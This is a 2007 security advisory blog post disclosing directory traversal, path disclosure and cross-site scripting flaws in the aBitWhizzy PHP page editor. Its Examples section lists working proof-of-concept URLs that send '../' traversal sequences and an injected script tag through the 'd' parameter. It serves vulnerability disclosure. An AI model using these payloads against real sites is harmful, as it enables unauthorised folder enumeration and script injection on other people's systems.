aBitWhizzy traversal folder enumeration and XSS

Tuesday, March 27, 2007
################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisore:http://lostmon.blogspot.com/2007/03/
abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES
OSVDB ID:34505,34506,34507,34508
Secunia:SA24679
FrSIRT:FrSIRT/ADV-2007-1136
BID:23167
################################################

aBitWhizzy is a php script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).

aBitWhizzy contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'd' variable upon submission
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts.This could allow a
remote users to create a specially crafted URL that would
execute '../' directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.

This input validation error permits too Cross-site scripting
Style attacks and full path disclosure.

###################
VERSIONS
###################

Unknow version of aBitWhizzy

##################
SOLUTION
##################

No solutions was available at this time !!

######################
TIMELINE
######################

discovered:25-03-2007
vendor notify:25-03-2007
vendor response:---------
Private Disclosure:25-03-2007
public disclosure:27-03-2007

#######################
Examples
#######################

Path disclosure:

http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='

Folder enumeration:


http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings


Cross Site Scripting:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>


########################### €nd ###################################

Thnx to estrella Que te ailoviuu un monton ;P
Thnx to all Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...